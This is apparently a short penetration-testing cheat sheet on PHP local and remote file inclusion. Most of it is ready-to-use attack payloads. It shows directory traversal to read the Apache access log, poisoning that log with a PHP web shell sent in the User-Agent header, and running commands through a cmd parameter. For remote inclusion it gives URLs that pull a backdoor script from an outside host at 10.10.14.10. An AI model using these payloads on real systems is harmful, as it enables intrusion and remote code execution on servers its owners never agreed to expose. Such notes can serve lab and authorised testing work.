LFI And RFI
Directory traversal is used to read the contents of a file outside of the web server’s web root. File inclusion vulnerabilities allow us to include a file in the application’s run…
LFI & RFI
Local File Inclusion
Directory traversal is used to read the contents of a file outside of the web server’s web root. File inclusion vulnerabilities allow us to include a file in the application’s running code allowing use to execute local or remote files
Log Injection
Display contents of a log file (if dir traversal is present)
01http://adot.com/app/index.php?page=../../../../../var/log/apache2/access.logIt should have something like the following
0110.10.14.1 - - [19/Jun/2024:12:11:34 +0000] "GET /app/index.php?page=admin.php02HTTP/1.1" 200 2218 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/2010010103Firefox/91.0"We can then edit the User-Agent to the following in Burp for RCE
01<?php echo system($_GET['cmd']); ?>Now when we request the access log and add our command with the cmd parameter it will execute
01http://adot.com/app/index.php?page=../../../../../var/log/apache2/access.log&cmd=whoami{% hint style="info" %}
Windows apache logs located at C:\xampp\apache\logs\
{% endhint %}
Remote File Inclusion
Same concept as LFI except with remote files that can be accessed over HTTP or SMB. The allow_url_include options needs to be enabled within the PHP application to leverage this.
01/usr/share/webshells/php/simple-backdoor.php01http://adot.com/app/index.php?page=http://10.10.14.10/simple-backdoor.php&cmd=whoami02http://adot.com/app/index.php?page=http://10.10.14.10/shell.php